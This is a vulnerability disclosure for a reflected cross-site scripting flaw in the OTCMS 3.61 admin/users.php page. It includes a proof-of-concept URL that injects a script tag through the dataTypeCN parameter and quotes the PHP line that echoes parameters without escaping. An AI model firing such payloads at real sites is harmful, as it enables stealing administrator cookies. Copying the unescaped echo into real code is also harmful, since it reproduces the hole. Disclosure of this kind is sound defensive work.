OTCMS 3.61 reflected XSS (/users.php)

Description An issue was discovered in OTCMS 3.61. XSS exists in admin/users.php via the parameters: dataTypeCN dataMode dataModeStr Affect:XSS vulnerability can get administrator cookie or other XSS payloads.

Example

Take the dataTypeCN parameter as an example.

A payload to trigger the reflected XSS of dataTypeCN parameter:

http://10.211.55.4/admin/users.php?mudi=online&dataType=&dataTypeCN=%e5%9c%a8%e7%ba%bf%e4%bc%9a%e5%91%98g4ql8%22%3e%3cscript%3ealert(1)%3c%2fscript%3ezvx9q

Cross-site scripting (reflected)

The value of the dataTypeCN request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload g4ql8"><script>alert(1)</script>zvx9q was submitted in the dataTypeCN parameter. This input was echoed as g4ql8\"><script>alert(1)</script>zvx9q in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Affected files

admin/users.php source code(line 160):

echo('<form id="dealForm" name="dealForm" method="post" action="users_deal.php?mudi='. $mudi .'&nohrefStr=close" onsubmit="return CheckForm()"><input type="hidden" id="dataType" name="dataType" value="'. $dataType .'" /><input type="hidden" id="dataTypeCN" name="dataTypeCN" value="'. $dataTypeCN .'" /><input type="hidden" id="dataMode" name="dataMode" value="'. $dataMode .'" /><input type="hidden" id="dataModeStr" name="dataModeStr" value="'. $dataModeStr .'" /><input type="hidden" id="dataID" name="dataID" value="'. $dataID .'" />');